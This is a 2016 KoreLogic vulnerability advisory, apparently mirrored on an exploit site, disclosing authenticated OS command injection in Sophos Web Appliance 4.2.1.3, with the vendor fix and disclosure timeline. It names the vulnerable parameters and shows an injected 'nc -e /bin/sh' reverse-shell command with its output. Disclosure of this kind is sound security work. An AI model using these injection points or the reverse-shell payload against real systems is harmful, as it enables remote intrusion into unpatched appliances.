Sophos Web Appliance Remote Code Execution Vulnerability

ID 1337DAY-ID-26246
Type zdt
Reporter Matthew Bergin
Modified 2016-11-04T00:00:00


Exploit for php platform in category web applications

                                            Title: Sophos Web Appliance Remote Code Execution
Advisory ID: KL-001-2016-009
Publication Date: 2016.11.03
Publication URL:

1. Vulnerability Details

     Affected Vendor: Sophos
     Affected Product: Web Apppliance
     Affected Version: v4.2.1.3
     Platform: Embedded Linux
     CWE Classification: CWE-78: Improper Neutralization of Special Elements
                         used in an OS Command ('OS Command Injection'),
                         CWE-88: Argument Injection or Modification
     Impact: Remote Code Execution
     Attack vector: HTTP

2. Vulnerability Description

     An authenticated user of any privilege can execute arbitrary
     system commands as the non-root webserver user.

3. Technical Description

     Multiple parameters to the web interface are unsafely handled and
     can be used to run operating system commands, such as:

     POST /index.php?c=logs HTTP/1.1
     Host: [redacted]
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)
Gecko/20100101 Firefox/46.0
     Accept: text/javascript, text/html, application/xml, text/xml, */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     DNT: 1
     X-Requested-With: XMLHttpRequest
     X-Prototype-Version: 1.6.1
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Content-Length: 305
     Connection: close


     HTTP/1.1 200 OK
     Date: Tue, 10 May 2016 15:35:05 GMT
     Server: Apache
     Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,
     Pragma: no-cache
     X-Frame-Options: sameorigin
     X-Content-Type-Options: nosniff
     Connection: close
     Content-Type: text/html; charset=utf-8
     Content-Length: 207

     {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10


     The vulnerable parameters are: by, request_id, and txt_filter_domain

     That request launches the following process on the SWA:

     1000     16851  0.0  0.0   2728  1040 ?        S    15:43   0:00 sh -c
/opt/perl/bin/ --report=Filter --res=-
--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA=='
--start='2016/05/10' --end='2016/05/10' --action=''

     From the shell launched via netcat:

     id;uname -a;uptime
     uid=1000(spiderman) gid=1000(spiderman)
     Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
     15:52:34 up  4:26,  0 users,  load average: 0.11, 0.12, 0.15

4. Mitigation and Remediation Recommendation

     The vendor has issued a fix for this vulnerability in Version
     4.3 of SWA. Release notes available at:

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos
     2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
     2016.09.28 - KoreLogic requests status update.
     2016.09.28 - Sophos informs KoreLogic that an update including a fix
                  for this vulnerability will be available near the end
                  of October.
     2016.10.13 - Sophos informs KoreLogic that the update was released to a
                  limited customer base and is expected to be distributed
                  at-large over the following week.
     2016.11.03 - Public disclosure.

7. Proof of Concept

     See 3. Technical Description.

# [2018-01-03]  #